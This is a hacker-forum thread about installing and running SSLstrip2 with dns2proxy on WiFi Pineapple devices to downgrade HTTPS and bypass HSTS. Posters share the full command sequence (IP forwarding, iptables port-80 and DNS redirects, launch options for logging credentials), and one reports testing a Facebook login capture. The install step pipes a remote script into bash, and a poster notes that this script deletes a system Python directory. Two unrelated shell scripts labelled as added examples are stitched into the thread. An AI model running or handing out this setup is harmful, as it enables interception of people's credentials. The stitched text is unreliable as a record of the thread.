SSLstrip2 + dns2proxy (HSTS Bypassing)


Zylla

SSLstrip2 + dns2proxy
Now WORKING on the Pineapple NANO + TETRA.


Last update: 15.01.2017
Changelog:

  • Uploaded everything to github.


Install procedure:

root@Pineapple:~#  wget -qO- https://raw.githubusercontent.com/adde88/sslstrip-hsts-openwrt/master/INSTALL.sh | bash -s -- -v -v

(This launches an install script that downloads a .ipk file containing the tools, and installs all the Python libraries correctly.)


What now?
sslstrip2 and dns2proxy get installed to /usr/share/, or /sd/usr/share when using the Pineapple NANO.
When using dns2proxy, please check that you traverse into its directory before launching it. (If not you might encounter errors about missing files: (nospoof.cfg) etc.)

root@Pineapple:~# cd /sd/usr/share/sslstrip2/
root@Pineapple:~# python sslstrip.py --help

root@Pineapple:~# cd /sd/usr/share/dns2proxy/
root@Pineapple:~# python dns2proxy.py --help


Github repo. + source-files:
https://github.com/adde88/sslstrip-hsts-openwrt
 

OPKG Installation File: (For those who want to install it manually)
https://github.com/adde88/sslstrip-hsts-openwrt/raw/master/sslstrip-hsts_0.9_ar71xx.ipk

1 minute ago, mercredi said:

Hi,

Thank you for your work!

Everything works good, but I can't see any credentials on log files.

Good to hear that it's working!
About the logs: how do you launch sslstrip? What options are you supplying when you start it? (like the exact command you are issuing to start it)


First I run

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
python sslstrip.py -l 9000 -p -w log.txt
python dns2proxy.py

I got this error when I run: python sslstrip.py -l 9000 -p -w log.txt

sslstrip 0.9 + by Moxie Marlinspike running...
+ POC by Leonardo Nve
Traceback (most recent call last):
  File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 48, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 33, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 59, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 37, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
  File "/usr/lib/python2.7/site-packages/twisted/internet/selectreactor.py", line 139, in _doReadOrWrite
    why = getattr(selectable, method)()
  File "/usr/lib/python2.7/site-packages/twisted/internet/tcp.py", line 362, in doRead
    return self.protocol.dataReceived(data)
  File "/usr/lib/python2.7/site-packages/twisted/protocols/basic.py", line 232, in dataReceived
    why = self.lineReceived(line)
  File "/usr/lib/python2.7/site-packages/twisted/web/http.py", line 388, in lineReceived
    self.handleHeader(key, val)
  File "/sd/usr/share/sslstrip2/sslstrip/ServerConnection.py", line 103, in handleHeader
    self.client.responseHeaders.addRawHeader(key, value)
exceptions.AttributeError: ClientRequest instance has no attribute 'responseHeaders'
Traceback (most recent call last):
  File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 48, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 33, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 59, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 37, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
  File "/usr/lib/python2.7/site-packages/twisted/internet/selectreactor.py", line 139, in _doReadOrWrite
    why = getattr(selectable, method)()
  File "/usr/lib/python2.7/site-packages/twisted/internet/tcp.py", line 362, in doRead
    return self.protocol.dataReceived(data)
  File "/usr/lib/python2.7/site-packages/twisted/protocols/basic.py", line 232, in dataReceived
    why = self.lineReceived(line)
  File "/usr/lib/python2.7/site-packages/twisted/web/http.py", line 388, in lineReceived
    self.handleHeader(key, val)
  File "/sd/usr/share/sslstrip2/sslstrip/ServerConnection.py", line 103, in handleHeader
    self.client.responseHeaders.addRawHeader(key, value)
exceptions.AttributeError: ClientRequest instance has no attribute 'responseHeaders'

 


23 hours ago, mercredi said:

First I run

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
python sslstrip.py -l 9000 -p -w log.txt
python dns2proxy.py

I got this error when I run: python sslstrip.py -l 9000 -p -w log.txt

I'll do some testing later today, and see if i can replicate the issue. :)


On 17.1.2017 at 6:11 PM, mercredi said:

thanks

 

Which command did you use to make it work and see SSL POST? I tried all the options, but I can see only HTTP.

In the iptables command you used above you are only redirecting port 80 (HTTP).
You will need to redirect the HTTPS port (443) if you want to get that traffic as well.
That would explain why you're not seeing any encrypted traffic.


It seems like I might have slept too little the last week, lol.
You're not supposed to redirect port 443.

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
python dns2proxy.py -i $interface_name_here
python sslstrip.py -a -w /tmp/sslstrip_log

(replace "$interface_name_here" with the interface you are using)


Here's the usage of both tools:
sslstrip+

sslstrip 0.9 + by Moxie Marlinspike
Version + by Leonardo Nve
Usage: sslstrip <options>

Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post                       Log only SSL POSTs. (default)
-s , --ssl                        Log all SSL traffic to and from server.
-a , --all                        Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port>        Port to listen on (default 10000).
-f , --favicon                    Substitute a lock favicon on secure requests.
-k , --killsessions               Kill sessions in progress.
-h                                Print this help message.

 

dns2proxy:

usage: dns2proxy.py [-h] [-N] [-i INTERFACE] [-u IP1] [-d IP2] [-I IPS] [-S]
                    [-A ADMINIP]

optional arguments:
  -h, --help            show this help message and exit
  -N, --noforward       DNS Fowarding OFF (default ON)
  -i INTERFACE, --interface INTERFACE
                        Interface to use
  -u IP1, --ip1 IP1     First IP to add at the response
  -d IP2, --ip2 IP2     Second IP to add at the response
  -I IPS, --ips IPS     List of IPs to add after ip1,ip2 separated with commas
  -S, --silent          Silent mode
  -A ADMINIP, --adminIP ADMINIP
                        Administrator IP for no filtering

What is the exact command to see encrypted traffic?  

On 1/16/2017 at 8:07 AM, Zylla said:

Good to hear that it's working!
About the logs: how do you launch sslstrip? What options are you supplying when you start it? (like the exact command you are issuing to start it)

 


12 hours ago, Grognak said:

What is the exact command to see encrypted traffic?  

 

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
python dns2proxy.py -i $interface_name_here
python sslstrip.py -a -w /tmp/sslstrip_log

On 20.1.2017 at 7:18 PM, crazyclown said:

Will this work on the Mark V Firmware 2.4?

Sadly my Mark VI is dead, but I am pretty certain that one guy in this thread tested it, and mentioned that it was working.
You could just test it and report back. I don't see any special reasons for it not working.


  • 2 weeks later...

I'm interested! Planning to install this to my Wifi Pineapple NANO later today, but was curious about something. Can I have this running in the background (Connect to SSH, launch applications as instructed, then disconnect from SSH)? If so, will this work alongside other modules, such as DWall? Please excuse my lack of knowledge, I'm still learning.


On 2/8/2017 at 2:00 AM, Null Trace said:

I'm interested! Planning to install this to my Wifi Pineapple NANO later today, but was curious about something. Can I have this running in the background (Connect to SSH, launch applications as instructed, then disconnect from SSH)? If so, will this work alongside other modules, such as DWall? Please excuse my lack of knowledge, I'm still learning.

Hey Null Trace, you can have it running in the background if you install screen.

You can install this by using:

opkg install screen

Then, when you SSH in, run screen first by typing 'screen', run the commands, and before disconnecting hit CTRL-A and then D.

To retrieve your screen session type 'screen -r'. If you have more than one screen instance it will list them and you will need to type 'screen -r 4322', for example.

If you want to close a screen instance, retrieve it as above and type 'exit'.

As for running DWall etc., I'm not sure if it will work alongside, sorry :)

Hope this helps.


Hello,

I "seem" to have this working, as in no errors and I can see all the dnsproxy info flashing across the screen. I am not able to capture any passwords (I did a test with facebook.com and typed in a bogus email and password). I also used tcpdump and looked at the results. My data is still encrypted so that's why I cannot see my email address or password. Anyone have any ideas? Below are the commands I'm using.

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53

python dns2proxy.py -i wlan0  

python sslstrip.py -a -w /tmp/sslstrip_log

* wlan0 is the interface I'm hosting my AP on. Please see attachment for networking screen.

 

Thanks!!

Scrag

 

network.PNG


Hey Everybody.

I was really hoping someone could help a noob out  ;)

I "almost" got this working but I am stuck.  It appears dns2proxy is working but sslstrip is not.  Sslstrip just sits there after loading and does not display any info, and of course, does not strip ssl.

Here is what I'm doing:

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53

cd /sd/usr/share/dns2proxy/
python dns2proxy.py

cd /sd/usr/share/sslstrip2/
python sslstrip.py -a -w /sd/ssltrip-log.txt

I can visually see all kinds of responses on the dns2proxy screen, but for sslstrip, it just sits at

sslstrip 0.9 + by Moxie Marlinspike running...
+ POC by Leonardo Nve

Any thoughts?

 

Thanks!

Scrag


  • 2 weeks later...

Okay. To clear things up a bit.
SSLstrip2 + dns2proxy does not work on every site. Good examples are Google and Facebook.
Browsers and sites have implemented fixes against this attack, like caching.

But it does have more success-chance compared to regular boring sslstrip :)
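
What decides whether a site holds up here is largely its HSTS policy: a Strict-Transport-Security header that covers only the exact host leaves other hostnames under the domain without a policy, while includeSubDomains plus preloading closes that gap. The following is an added example, not part of the thread or of either tool, that grades a header value on those points. The function name hsts_grade and the grade labels are made up for illustration; the one-year threshold is the minimum max-age the browser preload list asks for.

```shell
#!/bin/sh
# Added example: grade a Strict-Transport-Security header value.
# hsts_grade and its labels are illustrative names, not taken from any tool.

ONE_YEAR=31536000   # minimum max-age accepted for the browser preload list

hsts_grade() {
    value=$1
    max_age=""
    subdomains=0
    preload=0

    if [ -z "$value" ]; then
        echo "none"                 # no policy at all
        return 0
    fi

    # Directives are ';'-separated and case-insensitive (RFC 6797).
    old_ifs=$IFS
    IFS=';'
    set -f                          # no glob expansion while splitting
    for directive in $value; do
        d=$(printf '%s' "$directive" | tr 'A-Z' 'a-z' | tr -d ' \t"')
        case $d in
            max-age=*)         max_age=${d#max-age=} ;;
            includesubdomains) subdomains=1 ;;
            preload)           preload=1 ;;
        esac
    done
    set +f
    IFS=$old_ifs

    case $max_age in
        ''|*[!0-9]*) echo "invalid"; return 0 ;;   # max-age is mandatory
    esac

    if [ "$max_age" -eq 0 ]; then
        echo "disabled"             # max-age=0 tells the browser to drop the policy
    elif [ "$subdomains" -eq 0 ]; then
        echo "host-only"            # other hostnames under the domain are not covered
    elif [ "$preload" -eq 1 ] && [ "$max_age" -ge "$ONE_YEAR" ]; then
        echo "preload-eligible"
    else
        echo "subdomains"           # covered, but only after a first clean visit
    fi
}

# Constructed sample headers, printed when the script is run with --demo.
if [ "${1:-}" = "--demo" ]; then
    for h in "" "max-age=31536000" "max-age=63072000; includeSubDomains; preload"; do
        printf '%-50s %s\n' "[$h]" "$(hsts_grade "$h")"
    done
fi
```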


On 10.3.2017 at 5:16 AM, Tar said:

Any news on updates like a module or something sweet?

Would very much like to see a module :P

Hi there!
I do have plans for making a module.
It's just that other stuff has been higher on my agenda, and I've got very few hours per day to work on stuff like this (work, kids, wife, etc.).

The module for the Mana Toolkit is my main project at the moment.
I actually didn't intend to make sslstrip+ into a project of its own, it just sorta' sprung out because it's a part of the Mana attack.
I thought people who weren't interested in Mana could still have an interest in sslstrip+, so I just made an installation package for people to enjoy.

But it seems it could really need a module. So hopefully I got something soon :)


On 3/14/2017 at 8:23 AM, Zylla said:

Hi there!
I do have plans for making a module.
It's just that other stuff has been higher on my agenda, and I've got very few hours per day to work on stuff like this (work, kids, wife, etc.).

The module for the Mana Toolkit is my main project at the moment.
I actually didn't intend to make sslstrip+ into a project of its own, it just sorta' sprung out because it's a part of the Mana attack.
I thought people who weren't interested in Mana could still have an interest in sslstrip+, so I just made an installation package for people to enjoy.

But it seems it could really need a module. So hopefully I got something soon :)

Hehe, yeah man a module would be great :P

One of the main reasons I got the wifipineapple was to use SSLstrip on my network, take your time lad looking for some great things out of this community :)


To those installing this, you may want to go through the INSTALL.sh script and install the relevant components manually. If you have an SD card in your NANO, the INSTALL.sh script will wipe out /usr/lib/python2.7 before trying to symlink a new '/sd/usr/lib/python2.7' directory it creates on the SD card. Bad news if you're already running Python stuff on your NANO.

 

 

 


2 minutes ago, Dirty Frank said:

To those installing this, you may want to go through the INSTALL.sh script and install the relevant components manually. If you have an SD card in your NANO, the INSTALL.sh script will wipe out /usr/lib/python2.7 before trying to symlink a new '/sd/usr/lib/python2.7' directory it creates on the SD card. Bad news if you're already running Python stuff on your NANO.

 

 

 

You are totally correct about the script wiping out the python directory. (/usr/lib/python2.7)
I had tons of issues with Python on the Nano. It seems to get confused when having "two python directories". One internal, and one on the SD-card.
For simplicity, and also because of the size of the libraries, I found it much better to have one directory on the SD-card and just sym-link that to the other directory.

But I guess I can create a warning message in the installer-script. Just in case :)


2 hours ago, Zylla said:

You are totally correct about the script wiping out the python directory. (/usr/lib/python2.7)
I had tons of issues with Python on the Nano. It seems to get confused when having "two python directories". One internal, and one on the SD-card.
For simplicity, and also because of the size of the libraries, I found it much better to have one directory on the SD-card and just sym-link that to the other directory.

But I guess I can create a warning message in the installer-script. Just in case :)

How about the installer symlink the installed files instead of the directory itself (ala install the pkg to /sd and then "ln -s /sd/usr/lib/python2.7/* /usr/lib/python2.7")?
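
The concern raised in the last posts, as an added example that is not part of the thread or of INSTALL.sh: report what the Python directory currently is before anything replaces it, and link the SD-card entries into it one by one without overwriting what is already there, which is the approach the last post suggests. The function names python_dir_state and link_entries are hypothetical, and the directories are passed as arguments.

```shell
#!/bin/sh
# Added example (hypothetical helper names, not from INSTALL.sh).

# Print what DIR currently is: symlink, missing, empty or populated.
python_dir_state() {
    dir=$1
    if [ -L "$dir" ]; then
        echo "symlink"              # already points somewhere else
    elif [ ! -d "$dir" ]; then
        echo "missing"
    elif [ -z "$(ls -A "$dir" 2>/dev/null)" ]; then
        echo "empty"
    else
        echo "populated"            # real files that a wipe would destroy
    fi
}

# Symlink every entry of SRC into DST, leaving existing DST entries untouched.
# Prints "linked=N skipped=M".
link_entries() {
    src=$1
    dst=$2
    linked=0
    skipped=0
    [ -d "$src" ] || return 1
    mkdir -p "$dst" || return 1
    for entry in "$src"/* "$src"/.[!.]*; do
        # An unmatched glob stays literal and names nothing: skip it.
        [ -e "$entry" ] || [ -L "$entry" ] || continue
        name=${entry##*/}
        if [ -e "$dst/$name" ] || [ -L "$dst/$name" ]; then
            skipped=$((skipped + 1))    # keep what is already installed
        else
            ln -s "$entry" "$dst/$name" || return 1
            linked=$((linked + 1))
        fi
    done
    echo "linked=$linked skipped=$skipped"
}

# Usage: sh preflight.sh --check [DIR]
if [ "${1:-}" = "--check" ]; then
    python_dir_state "${2:-/usr/lib/python2.7}"
fi
```

A result of "populated" from the check means the directory holds files that would be lost if it were removed and replaced by a symlink.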
